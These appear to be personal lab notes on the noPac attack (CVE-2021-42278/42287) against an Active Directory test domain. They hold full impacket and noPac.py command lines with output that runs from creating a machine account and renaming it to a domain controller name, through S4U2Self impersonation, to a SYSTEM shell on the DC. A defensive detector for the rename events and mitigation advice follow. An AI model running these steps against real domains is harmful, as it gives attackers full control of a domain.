Note: all of the experiments still need to be completed later.
(6) S4U2Self with PAC
Create the machine account machine6$
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/addcomputer.py -computer-name 'machine6$' -computer-pass 'Az123456@' -dc-ip 10.10.4.2 -method SAMR -debug sec.local/hack:"Az123456@"
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket
[*] Opening domain SEC...
[*] Successfully added machine account machine6$ with password Az123456@.
Change the sAMAccountName attribute of the machine account machine6$ to WIN2016-DC2
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# python3 renameMachine.py -current-name 'machine6$' -new-name "WIN2016-DC2" -dc-ip 10.10.4.7 sec.local/hack:"Az123456@"
/root/tools/impacket/examples/.venv/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Modifying attribute (sAMAccountName) of object (CN=machine6,CN=Computers,DC=sec,DC=local): (machine6$) -> (WIN2016-DC2)
[*] New sAMAccountName does not end with '$' (attempting CVE-2021-42278)
[*] Target object modified successfully!
Request a TGT as the machine account machine6$, using the sAMAccountName attribute value as the username
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# /root/.local/bin/getTGT.py -dc-ip WIN2016-DC2.sec.local sec/WIN2016-DC2:"Az123456@"
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in WIN2016-DC2.ccache
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# export KRB5CCNAME=WIN2016-DC2.ccache
Restore the machine account's sAMAccountName attribute value to machine6$
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# python3 renameMachine.py -current-name 'WIN2016-DC2' -new-name 'machine6$' -dc-ip 10.10.4.7 sec.local/hack:"Az123456@"
/root/tools/impacket/examples/.venv/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Modifying attribute (sAMAccountName) of object (CN=machine6,CN=Computers,DC=sec,DC=local): (WIN2016-DC2) -> (machine6$)
[*] Target object modified successfully!
Using the TGT from the previous step, issue an S4U2Self request to impersonate administrator for the CIFS service on WIN2016-DC2
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# /root/.local/bin/getST.py -spn cifs/WIN2016-DC2.sec.local sec/WIN2016-DC2@10.10.4.7 -k -no-pass -dc-ip 10.10.4.7 -impersonate administrator -self
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating administrator
[*] When doing S4U2self only, argument -spn is ignored
[*] Requesting S4U2self
[*] Saving ticket in administrator@WIN2016-DC2@SEC.LOCAL.ccache
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/impacket/examples]
└─# export KRB5CCNAME=administrator@WIN2016-DC2@SEC.LOCAL.ccache
noPac
(base) ┌──(.venv)─(root㉿Kali)-[~/tools/noPac]
└─# python3 noPac.py sec.local/test2:"Az123456@" -dc-ip 10.10.4.7 -shell
/root/tools/noPac/.venv/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
(noPac ASCII-art banner)
[*] Current ms-DS-MachineAccountQuota = 10
[*] We have more than one target, Pls choices the hostname of the -dc-ip you input.
[*] 0: WIN2019-DC1
[*] 1: WIN2016-DC2
[*] 2: WIN2019-DC3
>>> Your choice: 1
[*] Selected Target win2016-dc2.sec.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-WVRCFEPNZDR$"
[*] MachineAccount "WIN-WVRCFEPNZDR$" password = kbDBN@ar#Oal
[*] Successfully added machine account WIN-WVRCFEPNZDR$ with password kbDBN@ar#Oal.
[*] WIN-WVRCFEPNZDR$ object = CN=WIN-WVRCFEPNZDR,CN=Computers,DC=sec,DC=local
[*] WIN-WVRCFEPNZDR$ sAMAccountName == win2016-dc2
[*] Saving a DC's ticket in win2016-dc2.ccache
[*] Reseting the machine account to WIN-WVRCFEPNZDR$
[*] Restored WIN-WVRCFEPNZDR$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_win2016-dc2.sec.local.ccache
[*] Attempting to del a computer with the name: WIN-WVRCFEPNZDR$
[-] Delete computer WIN-WVRCFEPNZDR$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
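Both runs above depend on the same observable event: a computer account whose sAMAccountName is changed to a name without a trailing '$' that collides with a domain controller's name, and is then changed back once the TGT has been obtained. The following is an added defensive example, not code from this lab or from the impacket/noPac projects: it models Security log events 4741 (computer account created) and 4742 (computer account changed) as small records, and flags exactly that rename pattern. The event records and the subject names are constructed samples shaped after the sequence in the notes; the domain controller list is the one printed by the tool output above.

```python
"""Detect sAMAccountName spoofing (CVE-2021-42278 pattern) in computer-account
change events. Added example; the events below are constructed, not captured."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set


@dataclass
class AccountChangeEvent:
    """Minimal view of a Security log event 4741 (created) / 4742 (changed)."""
    event_id: int
    subject: str                    # account that made the change
    target_dn: str                  # distinguished name of the computer object
    old_sam: Optional[str] = None   # previous sAMAccountName, if it changed
    new_sam: Optional[str] = None   # new sAMAccountName, if it changed


# Constructed sample events modelled on the rename sequence in the lab notes.
SAMPLE_EVENTS: List[AccountChangeEvent] = [
    AccountChangeEvent(4741, "SEC\\hack", "CN=machine6,CN=Computers,DC=sec,DC=local",
                       new_sam="machine6$"),
    AccountChangeEvent(4742, "SEC\\hack", "CN=machine6,CN=Computers,DC=sec,DC=local",
                       old_sam="machine6$", new_sam="WIN2016-DC2"),
    AccountChangeEvent(4742, "SEC\\hack", "CN=machine6,CN=Computers,DC=sec,DC=local",
                       old_sam="WIN2016-DC2", new_sam="machine6$"),
    # A benign rename that keeps the '$' and does not collide with a DC name.
    AccountChangeEvent(4742, "SEC\\itadmin", "CN=WS01,CN=Computers,DC=sec,DC=local",
                       old_sam="WS01$", new_sam="WS02$"),
]

# Domain controller hostnames as listed by the tool output above.
DOMAIN_CONTROLLERS: Set[str] = {"WIN2019-DC1", "WIN2016-DC2", "WIN2019-DC3"}


def normalise(sam: str) -> str:
    """Compare names case-insensitively and without the machine-account '$'."""
    return sam.rstrip("$").lower()


def find_samaccountname_spoofing(events: Iterable[AccountChangeEvent],
                                 dc_names: Iterable[str]) -> List[Dict]:
    """Return one finding per suspicious 4742 rename.

    A rename is suspicious when the new sAMAccountName drops the trailing '$'
    or matches a domain controller's name. If a later 4742 on the same object
    changes the name back, the finding is marked 'reverted', which is the
    full rename -> ticket -> restore sequence rather than a one-off mistake.
    """
    dc_set = {normalise(d) for d in dc_names}
    findings: List[Dict] = []
    open_by_dn: Dict[str, Dict] = {}
    for ev in events:
        if ev.event_id != 4742 or ev.new_sam is None:
            continue
        # A change whose old name equals an earlier suspicious new name is the revert.
        pending = open_by_dn.get(ev.target_dn)
        if pending is not None and ev.old_sam == pending["new_sam"]:
            pending["reverted"] = True
            del open_by_dn[ev.target_dn]
        reasons = []
        if not ev.new_sam.endswith("$"):
            reasons.append("computer account renamed to a name without trailing '$'")
        if normalise(ev.new_sam) in dc_set:
            reasons.append("new name collides with a domain controller's sAMAccountName")
        if reasons:
            finding = {"subject": ev.subject, "target_dn": ev.target_dn,
                       "old_sam": ev.old_sam, "new_sam": ev.new_sam,
                       "reasons": reasons, "reverted": False}
            findings.append(finding)
            open_by_dn[ev.target_dn] = finding
    return findings


if __name__ == "__main__":
    for f in find_samaccountname_spoofing(SAMPLE_EVENTS, DOMAIN_CONTROLLERS):
        print(f)
```

Run against the constructed events, the only finding is the machine6 rename to WIN2016-DC2 by SEC\hack, with both reasons set and reverted=True; the WS01$ to WS02$ rename is not reported. In a real deployment the records would be filled from the 4742 fields (Subject, Target Account, "SAM Account Name") and the DC list from the domain's Domain Controllers OU. The tool output above also shows ms-DS-MachineAccountQuota = 10, which is what lets an unprivileged user create the throwaway computer account in the first place; setting it to 0 and applying the updates for CVE-2021-42278 removes the precondition rather than only detecting the rename.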